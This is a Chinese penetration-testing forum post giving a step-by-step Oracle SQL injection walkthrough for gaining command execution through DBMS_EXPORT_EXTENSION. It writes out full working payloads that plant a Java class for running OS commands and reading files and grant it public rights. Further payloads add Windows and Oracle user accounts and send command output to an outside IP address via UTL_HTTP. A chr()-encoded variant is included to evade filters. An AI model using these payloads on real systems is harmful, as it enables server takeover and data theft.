找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 实例演示oracle注入获取cmdshell的全过程
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2299|回复: 0
打印 上一主题 下一主题

实例演示oracle注入获取cmdshell的全过程

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-18 12:21:48 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
4 H* G" f; l6 K( ?' b" z$ M# n5 X. L
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) 9 C& Q, k5 }0 e! J, l
的形式即可。(用" 'a'|| "是为了让语句返回true值)
8 t6 o2 c* u+ b! }4 c+ u) s语句有点长,可能要用post提交。
+ }3 P1 j4 `* s以下是各个步骤: $ n( a9 F% n* j
1.创建包 ( S% w/ c7 Z% N- Q  T
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
- V% |% p$ N. K/ X9 L/xxx.jsp?id=1 and '1'<>'a'||( 4 s/ H9 T+ z" z
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
& x) J: F' W& q4 O/ Ecreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(- g3 f# U/ K. j2 |
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
) m0 q. Y2 f1 X& N0 L- T}'''';END;'';END;--','SYS',0,'1',0) from dual # A  s: Y% ~% l* V2 _, ]
) 4 d. m! A$ q2 ^4 E( Y' {
------------------------
, _; }0 a* u# f0 p# u1 F- j如果url有长度限制,可以把readFile()函数块去掉,即:
0 H& P7 }9 c2 N3 H1 a" {/xxx.jsp?id=1 and '1'<>'a'||( ( c3 i0 ?1 ^' O* E. R; u
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
" I1 r3 o% ?. j4 g, acreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(- c1 o9 i! o7 n9 M' N. [/ d
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}7 N. y8 |3 i& b4 Z7 [& f$ ?
}'''';END;'';END;--','SYS',0,'1',0) from dual 4 ~9 ~! Z. D, u  i% U& _
) $ m- H( s' f5 F, M' _  X7 `
同时把后面步骤 提到的 对readFile()的处理语句去掉。
2 a# }/ B9 i+ R! b7 r0 w1 T$ f2 r------------------------------
$ f, [% {+ `1 _9 A9 V2.赋Java权限 ; j* e; s! a. b% O  U1 [) I
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
, X$ E4 r9 S5 r9 n. z0 k3.创建函数
* y  r& }$ q' ?select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''7 E/ d7 w* F; w0 G1 @
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual* b5 _+ y# X2 U) X
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''- }* L3 R. ]0 G# t
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual1 w8 b9 s( a. E- |: }
4.赋public执行函数的权限 4 h' a. b: h/ W/ O
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual' s5 T9 {5 x/ I" z- Z
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual# g4 {# [& c9 D. x1 k
5.测试上面的几步是否成功 * s4 b' j. I% {" \$ L
and '1'<>'11'||( ' G+ Q# G7 m6 y' p( l; M
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD' ' m# ?  _0 z" s" n+ U
) ! A  v" q4 h/ k: n5 L  P
and '1'<>( . y- N# t5 w0 b2 E7 q
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE' $ _0 c1 _; Y# G9 X$ a
) ! S7 u# J+ y. u) \3 I1 D
6.执行命令:
* b: j+ R4 b1 M* h. W/xxx.jsp?id=1 and '1'<>(
/ [5 V6 G0 l1 f6 r# Kselect  sys.LinxRunCMD('cmd /c net user linx /add') from dual
# h& P  T. }& n8 p# X
" ]5 g: j( j# c% G' m- l) " @8 ?- F$ O0 x+ m
/xxx.jsp?id=1 and '1'<>(
4 a/ S4 U! n1 T* o  Y. o, q* D. \. wselect  sys.LinxReadFile('c:/boot.ini') from dual9 y" F# r6 n0 A% x

" E- a5 ?+ D/ P' f+ A$ R)% B! f- e. @0 C9 ]* a
  
$ T* N1 J, G# b2 O; x注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 2 W* X5 c1 V* G0 d1 q, q
如果要查看运行结果可以用 union :
4 w8 l' M: B/ N0 h/ S1 ~/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
& S8 s. U' h5 Z. O. `0 Y或者UTL_HTTP.request(:
4 r# e6 N( ]5 Q' F4 j9 X0 L/xxx.jsp?id=1 and '1'<>( * J  a  j. G7 u3 R7 C) k, z! }( c4 M
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual5 c2 M3 s  b& u0 I% [
)
% m% s/ O' O$ a+ B: |/xxx.jsp?id=1 and '1'<>( : h/ x' K5 W& y  v+ X  g4 n
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual6 A! J' `) B& w" S0 b+ ?$ \
)
1 B" |: a  z$ e. \1 |9 O, B9 C注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。3 ^" t1 [( H  |9 c' `0 t
-------------------- ( W- J7 d4 N) v
6.内部变化
( ~( r) O7 Q5 U6 ]: e通过以下命令可以查看all_objects表达改变:
7 i( y$ _. u! ~7 O0 D, _select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'  l9 L! @, \: Z( ~7 K: j/ S
7.删除我们创建的函数
1 b: p) r  x5 i  U, R1 R. E2 F) rselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
9 @, m' K1 j& r% N  Udrop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual ) G' L0 F1 ?4 h9 K( N5 }/ w) ?
====================================================
7 f! f8 U3 U' g9 O全文结束。谨以此文赠与我的朋友。
  ?+ ]. |( C. w) d) J4 W9 jlinx % ~' A6 D' r- W' s/ t/ a
124829445 3 f4 p7 L4 k+ O* B0 ?
2008.1.12 6 Y3 j- F! S/ @& H3 K! Q
linyujian@bjfu.edu.cn 8 `* l7 y- H* R: X, q$ v  h
======================================================================
+ r% x* ]' o1 F8 P" x/ K/ O测试漏洞的另一方法: 2 L( Y8 L2 \2 C2 ~, ^
创建oracle帐号: ' e# t8 f7 v5 B
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''1 D) O+ n6 P; ~1 B7 o  N
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
% k0 M5 G! O5 p. W即:
8 B" z+ l, U6 O, Uselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),5 o6 Y2 T% N0 i) ]: T: l2 J
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual - M( S  ^# @7 M* m; R& o  l* W- m+ n8 l
确定漏洞存在: . J; h; J' g# C7 ]
1<>( ) k) m  x/ A; H, E
select user_id from all_users where username='LINXSQL' % G: ?0 v4 v7 y& V+ z2 g/ B& ?) O" z, _
)
- S, U* Y) w4 i9 T) h. y, C+ r给linxsql连接权限:
9 \/ V# K6 s- b) Sselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
* d' l4 d6 i% x0 W5 u  |/ M$ MGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
8 q1 [4 C; }' r4 u删除帐号:
" D, h: S& z* x, y$ `; L" Fselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
$ k" P( g6 J# ]1 u) }4 Tdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
% v: I% d4 D* j$ x======================
# t) R0 M# L$ ^8 I以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
) i0 S0 v# Q3 c! j4 h1.jsp?id=1 and '1'<>( 1 s& B- f, |( F, ?! q. t  t" N
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''+ M" m- `  v: s% i3 c" ?
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
: {: \0 h6 v+ T5 u0 ^* S) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
. j- o( x* N2 g. \. y' E5 G- K ). j! b+ c- J! I8 ]$ m1 N
2 [3 M; E2 g6 A' j6 [
) T5 V" }, N; q7 U" @* j0 o  [2 R! t
, B1 O, Y2 R! H& c4 K6 W
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表